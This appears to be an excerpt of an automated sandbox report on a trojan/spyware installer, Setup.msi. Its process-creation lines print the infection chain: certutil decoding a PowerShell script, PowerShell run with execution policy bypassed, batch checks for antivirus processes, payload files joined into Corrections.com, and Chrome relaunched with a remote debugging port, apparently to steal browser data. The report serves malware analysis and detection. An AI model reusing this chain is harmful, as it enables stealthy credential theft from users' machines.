            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F83BF44_2_00007FF749F83BF4
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F91CAC4_2_00007FF749F91CAC
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F8F9484_2_00007FF749F8F948
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F73A334_2_00007FF749F73A33
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F98A804_2_00007FF749F98A80
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F87A7C4_2_00007FF749F87A7C
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F88AA84_2_00007FF749F88AA8
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F64ACC4_2_00007FF749F64ACC
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F56AC74_2_00007FF749F56AC7
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F91F2C4_2_00007FF749F91F2C
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F85F504_2_00007FF749F85F50
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F45F604_2_00007FF749F45F60
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F93FC44_2_00007FF749F93FC4
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F760104_2_00007FF749F76010
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F960A04_2_00007FF749F960A0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F580A04_2_00007FF749F580A0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F680E84_2_00007FF749F680E8
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F7FD1C4_2_00007FF749F7FD1C
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F5CD404_2_00007FF749F5CD40
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F54DB44_2_00007FF749F54DB4
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F8EE384_2_00007FF749F8EE38
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F5EEDC4_2_00007FF749F5EEDC
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F813E84_2_00007FF749F813E8
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F924104_2_00007FF749F92410
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F8A4644_2_00007FF749F8A464
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F5E4684_2_00007FF749F5E468
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F6E4A04_2_00007FF749F6E4A0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F6A4E04_2_00007FF749F6A4E0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F7F4FC4_2_00007FF749F7F4FC
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F8C5144_2_00007FF749F8C514
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F8412C4_2_00007FF749F8412C
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F751604_2_00007FF749F75160
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F741C84_2_00007FF749F741C8
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F672684_2_00007FF749F67268
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F892C44_2_00007FF749F892C4
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F8F2D04_2_00007FF749F8F2D0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F8D2D44_2_00007FF749F8D2D4
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F6B2F04_2_00007FF749F6B2F0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F7F2F84_2_00007FF749F7F2F8
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F937904_2_00007FF749F93790
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F927C04_2_00007FF749F927C0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F728044_2_00007FF749F72804
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F6881C4_2_00007FF749F6881C
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F818584_2_00007FF749F81858
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F5389C4_2_00007FF749F5389C
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F638EC4_2_00007FF749F638EC
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F7F90C4_2_00007FF749F7F90C
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F4D5904_2_00007FF749F4D590
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F665C44_2_00007FF749F665C4
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F485C04_2_00007FF749F485C0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F6F5C04_2_00007FF749F6F5C0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F535E04_2_00007FF749F535E0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F976004_2_00007FF749F97600
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F5B6184_2_00007FF749F5B618
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F7F7084_2_00007FF749F7F708
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B3E4B519_2_00007FFD9B3E4B51
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_0040737E16_2_0040737E
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406EFE16_2_00406EFE
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_004079A216_2_004079A2
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_004049A816_2_004049A8
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F6801726_2_00F68017
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F4E1F026_2_00F4E1F0
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F5E14426_2_00F5E144
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F622A226_2_00F622A2
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F422AD26_2_00F422AD
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F7A26E26_2_00F7A26E
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F5C62426_2_00F5C624
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FCC8A426_2_00FCC8A4
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F7E87F26_2_00F7E87F
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F76ADE26_2_00F76ADE
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB2A0526_2_00FB2A05
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FA8BFF26_2_00FA8BFF
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F5CD7A26_2_00F5CD7A
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F6CE1026_2_00F6CE10
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F7715926_2_00F77159
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F4924026_2_00F49240
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FD531126_2_00FD5311
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F496E026_2_00F496E0
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F6170426_2_00F61704
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F61A7626_2_00F61A76
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F67B8B26_2_00F67B8B
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F49B6026_2_00F49B60
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F67DBA26_2_00F67DBA
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F61D2026_2_00F61D20
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F61FE726_2_00F61FE7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: String function: 00F60DA0 appears 46 times
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: String function: 00F5FD52 appears 40 times
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: String function: 004062CF appears 57 times
            Source: Setup.msiBinary or memory string: OriginalFilenameviewer.exeF vs Setup.msi
            Source: Setup.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs Setup.msi
            Source: QQ9RQQ.26.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
            Source: classification engineClassification label: mal100.troj.spyw.evad.winMSI@58/88@5/7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB41FA GetLastError,FormatMessageW,26_2_00FB41FA
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FA2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,26_2_00FA2010
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FA1A0B AdjustTokenPrivileges,CloseHandle,26_2_00FA1A0B
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,16_2_004044D1
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F45A80 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,4_2_00007FF749F45A80
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F46AC0 CoInitializeEx,CoCreateInstance,VariantInit,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,VariantInit,LocalFree,LocalFree,SysAllocString,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF749F46AC0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F41B70 LoadResource,LockResource,SizeofResource,4_2_00007FF749F41B70
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\SoftPortableJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAE63.tmpJump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs"
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: KFUSRIECT.26.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Setup.msi"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50B4D686C01703530B412DCED2DB0D4F C
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E4D759A8E406C9ACB7BC72DE0FA3790E
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI64FB.tmp "C:\Windows\Installer\MSI64FB.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KingSoft\1.bat"
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -decode -f C:\Users\user\AppData\Local\Temp\11808.ps1 C:\Users\user\AppData\Local\Temp\11808.ps1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs"
            Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe"
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 628056
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cleared" Penalties
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Corrections.com u
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2408,i,649146787284632151,17109937592652742530,262144 /prefetch:8
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50B4D686C01703530B412DCED2DB0D4F CJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E4D759A8E406C9ACB7BC72DE0FA3790EJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI64FB.tmp "C:\Windows\Installer\MSI64FB.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KingSoft\1.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -decode -f C:\Users\user\AppData\Local\Temp\11808.ps1 C:\Users\user\AppData\Local\Temp\11808.ps1Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs"Jump to behavior
            Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 628056
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cleared" Penalties
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Corrections.com u
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2408,i,649146787284632151,17109937592652742530,262144 /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
